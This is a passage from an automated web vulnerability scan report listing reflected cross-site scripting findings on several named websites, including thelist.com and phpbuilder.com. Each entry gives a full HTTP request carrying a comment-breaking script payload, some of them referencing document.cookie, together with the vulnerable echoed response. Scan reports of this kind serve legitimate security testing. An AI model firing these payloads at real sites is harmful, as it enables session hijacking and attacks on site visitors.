The value of the e9235--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E627b6f7c09f request parameter is copied into an HTML comment. The payload 838ab--><script>alert(1)</script>8aeba5f5436 was submitted in the e9235--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E627b6f7c09f parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?e9235--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E627b6f7c09f=1838ab--><script>alert(1)</script>8aeba5f5436 HTTP/1.1 Host: www.palmblvd.com Proxy-Connection: keep-alive Referer: http://www.palmblvd.com/welcomead/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.palmblvd.com/%3Fe9235--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E627b6f7c09f%3D1; qsg=14508
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:22:27 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:23:27 GMT Content-Type: text/html Content-Length: 70947
<HTML> <HEAD> <TITLE>Palm Boulevard: Newsletters</TITLE> <META name="resource-type" content="document"> <META name="distribution" content="global"> <META NAME="date" CONTENT=""> <META NAME=" ...[SNIP]... <!-- marketplace01: Missing QUAD ads for page_type: other on path www.palmblvd.com with position A1 url: /?e9235--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E627b6f7c09f=1838ab--><script>alert(1)</script>8aeba5f5436 --> ...[SNIP]...
3.110. http://www.palmblvd.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.palmblvd.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload e9235--><script>alert(1)</script>627b6f7c09f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?e9235--><script>alert(1)</script>627b6f7c09f=1 HTTP/1.1 Host: www.palmblvd.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 14:57:48 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 14:58:48 GMT Connection: close Content-Type: text/html Content-Length: 70187
<HTML> <HEAD> <TITLE>Palm Boulevard: Newsletters</TITLE> <META name="resource-type" content="document"> <META name="distribution" content="global"> <META NAME="date" CONTENT=""> <META NAME=" ...[SNIP]... <!-- marketplace01: Missing QUAD ads for page_type: other on path www.palmblvd.com with position A1 url: /?e9235--><script>alert(1)</script>627b6f7c09f=1 --> ...[SNIP]...
3.111. http://www.pdastreet.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.pdastreet.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 79bf7--><script>alert(1)</script>338075590f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?79bf7--><script>alert(1)</script>338075590f4=1 HTTP/1.1 Host: www.pdastreet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 14:59:32 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:00:32 GMT Connection: close Content-Type: text/html Content-Length: 69345
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> <HTML> <HEAD> <TITLE>PDAStreet - The PDA Network for Handheld Computers, PDA Software, Windows CE, Pocket PC, Palm Pilot, Psion, iPaq, Pocket PC 2002, ...[SNIP]... <!-- house_ribbon: Missing QUAD ads for page_type: other on path www.pdastreet.com with position V url: /?79bf7--><script>alert(1)</script>338075590f4=1 --> ...[SNIP]...
The value of the 7640d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeb4ef76d865 request parameter is copied into an HTML comment. The payload 4ebfc--><script>alert(1)</script>0eb00a3c424 was submitted in the 7640d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeb4ef76d865 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?7640d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeb4ef76d865=14ebfc--><script>alert(1)</script>0eb00a3c424 HTTP/1.1 Host: www.phpbuilder.com Proxy-Connection: keep-alive Referer: http://www.phpbuilder.com/welcomead/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.phpbuilder.com/%3F7640d--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eeb4ef76d865%3D1; qsg=14508
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:20:54 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:21:54 GMT Content-Type: text/html Content-Length: 72352
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>PHPBuilder.com, the best reso ...[SNIP]... <!-- house_ribbon: Missing QUAD ads for page_type: other on path www.phpbuilder.com with position T url: /?7640d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeb4ef76d865=14ebfc--><script>alert(1)</script>0eb00a3c424 --> ...[SNIP]...
3.113. http://www.phpbuilder.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.phpbuilder.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 7640d--><script>alert(1)</script>eb4ef76d865 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?7640d--><script>alert(1)</script>eb4ef76d865=1 HTTP/1.1 Host: www.phpbuilder.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 14:57:36 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 14:58:36 GMT Connection: close Content-Type: text/html Content-Length: 72210
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>PHPBuilder.com, the best reso ...[SNIP]... <!-- house_ribbon: Missing QUAD ads for page_type: other on path www.phpbuilder.com with position T url: /?7640d--><script>alert(1)</script>eb4ef76d865=1 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 4afe8--><script>alert(1)</script>959f959b02d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /favicon.ico4afe8--><script>alert(1)</script>959f959b02d HTTP/1.1 Host: www.phpbuilder.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.phpbuilder.com/%3F7640d--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eeb4ef76d865%3D1
Response
HTTP/1.1 404 Not Found Date: Fri, 18 Feb 2011 15:20:29 GMT Server: Apache Content-Type: text/html Content-Length: 43228
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>PHPBuilder.com, the best reso ...[SNIP]... <!-- house_ribbon: Missing QUAD ads for page_type: other on path www.phpbuilder.com with position T url: /favicon.ico4afe8--><script>alert(1)</script>959f959b02d --> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload fb26c--><script>alert(1)</script>a4e106c783c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /welcomeadfb26c--><script>alert(1)</script>a4e106c783c/ HTTP/1.1 Host: www.phpbuilder.com Proxy-Connection: keep-alive Referer: http://www.phpbuilder.com/?7640d--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeb4ef76d865=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.phpbuilder.com/%3F7640d--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253Eeb4ef76d865%3D1
Response
HTTP/1.1 404 Not Found Date: Fri, 18 Feb 2011 15:20:30 GMT Server: Apache Content-Type: text/html Content-Length: 43262
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>PHPBuilder.com, the best reso ...[SNIP]... <!-- house_ribbon: Missing QUAD ads for page_type: index on path www.phpbuilder.com with position T url: /welcomeadfb26c--><script>alert(1)</script>a4e106c783c/ --> ...[SNIP]...
The value of the 10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82 request parameter is copied into an HTML comment. The payload e3c0e--><script>alert(1)</script>db344f8e464 was submitted in the 10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82=1e3c0e--><script>alert(1)</script>db344f8e464 HTTP/1.1 Host: www.smartphonetoday.com Proxy-Connection: keep-alive Referer: http://www.smartphonetoday.com/welcomead/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: QUADIDX=107; intmintc__welcome; toURL=http%3A//www.smartphonetoday.com/%3F10d85--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E11ae5b1cf82%3D1; qsg=14508
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:19:21 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 15:20:21 GMT Content-Type: text/html Content-Length: 85506
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> <HTML> <HEAD> <TITLE>SmartPhone Today - The Complete Independent SmartPhone Information Resource </TITLE> <META name="description" content="The Inte ...[SNIP]... <!-- marketplace04: Missing QUAD ads for page_type: other on path www.smartphonetoday.com with position E1 url: /?10d85--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E11ae5b1cf82=1e3c0e--><script>alert(1)</script>db344f8e464 --> ...[SNIP]...
3.117. http://www.smartphonetoday.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.smartphonetoday.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 10d85--><script>alert(1)</script>11ae5b1cf82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?10d85--><script>alert(1)</script>11ae5b1cf82=1 HTTP/1.1 Host: www.smartphonetoday.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 14:57:52 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 14:58:52 GMT Connection: close Content-Type: text/html Content-Length: 84610
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> <HTML> <HEAD> <TITLE>SmartPhone Today - The Complete Independent SmartPhone Information Resource </TITLE> <META name="description" content="The Inte ...[SNIP]... <!-- marketplace04: Missing QUAD ads for page_type: other on path www.smartphonetoday.com with position E1 url: /?10d85--><script>alert(1)</script>11ae5b1cf82=1 --> ...[SNIP]...
3.118. http://www.thecounter.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.thecounter.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6955f--><script>alert(1)</script>e525c47aab4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?6955f--><script>alert(1)</script>e525c47aab4=1 HTTP/1.1 Host: www.thecounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 15:00:56 GMT Server: Apache Connection: close Content-Type: text/html Content-Length: 41197
<html> <head> <title>TheCounter.com - The Affordable Web Site Analysis Tool</title> <!-- test test -->
<LINK REL="stylesheet" HREF="/css/text.css" TYPE="text/css"> <meta http-equiv="Content-Type" con ...[SNIP]... <!-- : Missing QUAD ads for page_type: other on path www.thecounter.com with position ciu url: /?6955f--><script>alert(1)</script>e525c47aab4=1 --> ...[SNIP]...
3.119. http://www.thelist.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.thelist.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6fd89--><script>alert(1)</script>3e9f72d52de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?6fd89--><script>alert(1)</script>3e9f72d52de=1 HTTP/1.1 Host: www.thelist.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 12:47:03 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 12:48:03 GMT Content-Type: text/html Content-Length: 46036
<HTML> <HEAD> <TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE> <META NAME="description" CONTENT="Find an ISP that fits your internet access needs on TheList.com. TheList.com is ...[SNIP]... <!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1 url: /?6fd89--><script>alert(1)</script>3e9f72d52de=1 --> ...[SNIP]...
3.120. http://www.thelist.com/HTML/5/2349355.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.thelist.com
Path:
/HTML/5/2349355.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 236a8--><script>alert(1)</script>8d68ddba170 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 12:48:39 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 12:49:39 GMT Content-Type: text/html Content-Length: 45210
<HTML> <HEAD> <TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script> <script langua ...[SNIP]... <!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1 url: /HTML/5/2349355.html?236a8--><script>alert(1)</script>8d68ddba170=1 --> ...[SNIP]...
3.121. http://www.thelist.com/HTML/7/2331187.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.thelist.com
Path:
/HTML/7/2331187.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 3a773--><script>alert(1)</script>cf39e5ac2b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 12:48:52 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 12:49:52 GMT Content-Type: text/html Content-Length: 44681
<HTML> <HEAD> <TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<script src="/icom_includes/quad/thelist/config.js"></script> <script src="/icom_includes/quad/QUAD_AD.js"></scr ...[SNIP]... <!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1 url: /HTML/7/2331187.html?3a773--><script>alert(1)</script>cf39e5ac2b3=1 --> ...[SNIP]...
3.122. http://www.thelist.com/add.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.thelist.com
Path:
/add.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload d2f7f--><script>alert(1)</script>c4dfa717f01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /add.php?d2f7f--><script>alert(1)</script>c4dfa717f01=1 HTTP/1.1 Host: www.thelist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 14:52:30 GMT Server: Apache Set-Cookie: PHPSESSID=b6743747b67654794e4b7778bff3bbae; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 47159
<HTML> <HEAD> <TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE> <script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script> <script langua ...[SNIP]... <!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1 url: /add.php?d2f7f--><script>alert(1)</script>c4dfa717f01=1 --> ...[SNIP]...
3.123. http://www.thelist.com/areacode.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.thelist.com
Path:
/areacode.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 74a93--><script>alert(1)</script>e34ffffc7c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /areacode.html?74a93--><script>alert(1)</script>e34ffffc7c6=1 HTTP/1.1 Host: www.thelist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 14:52:33 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 14:53:33 GMT Connection: close Content-Type: text/html Content-Length: 58520
<HTML> <HEAD> <TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script> <script langua ...[SNIP]... <!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1 url: /areacode.html?74a93--><script>alert(1)</script>e34ffffc7c6=1 --> ...[SNIP]...
3.124. http://www.thelist.com/countrycode.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.thelist.com
Path:
/countrycode.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 30741--><script>alert(1)</script>8e229fc5059 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /countrycode.html?30741--><script>alert(1)</script>8e229fc5059=1 HTTP/1.1 Host: www.thelist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 14:52:35 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 14:53:35 GMT Connection: close Content-Type: text/html Content-Length: 70479
<HTML> <HEAD> <script language="javascript" src="http://e1.cdn.qnsr.com/cgi/d/0/0/203/630903/cmp0.js"></script> <script language="javascript" src="http://e1.cdn.qnsr.com/jsc/e1/fx.js"></script> <scrip ...[SNIP]... <!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1 url: /countrycode.html?30741--><script>alert(1)</script>8e229fc5059=1 --> ...[SNIP]...
3.125. http://www.thelist.com/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.thelist.com
Path:
/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload eff60--><script>alert(1)</script>398ed0a3768 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index.html?eff60--><script>alert(1)</script>398ed0a3768=1 HTTP/1.1 Host: www.thelist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _bizo_cksm_crc32=63F05AC3; WT_FPC=id=173.193.214.243-1005375472.30133593:lv=1298026164021:ss=1298026063098; QUADIDX=107; __utmz=219744476.1298033251.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _bizo_bzid=a1177894-f476-4957-80ae-6dca795c7582; __utma=219744476.112721583.1298033251.1298033251.1298033251.1; qsg=14508; _bizo_np_stats=107%3D65%2C221%3D89%2C224%3D1157%2C155%3D1344%2C; __utmc=219744476; __utmb=219744476.8.10.1298033251; _bizo_cksm=1260A44F5CFBD6E0;
Response
HTTP/1.1 200 OK Date: Fri, 18 Feb 2011 14:52:31 GMT Server: Apache Cache-Control: max-age=60 Expires: Fri, 18 Feb 2011 14:53:31 GMT Connection: close Content-Type: text/html Content-Length: 46084
<HTML> <HEAD> <TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE> <META NAME="description" CONTENT="Find an ISP that fits your internet access needs on TheList.com. TheList.com is ...[SNIP]... <!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1 url: /index.html?eff60--><script>alert(1)</script>398ed0a3768=1 --> ...[SNIP]...
3.126. http://www.thelist.com/misc/canada/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.thelist.com
Path:
/misc/canada/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload d970c--><script>alert(1)</script>4f484edfe23 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
